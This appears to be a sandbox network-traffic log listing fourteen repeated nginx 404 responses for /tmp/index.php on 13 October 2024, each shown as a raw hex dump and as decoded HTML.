Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
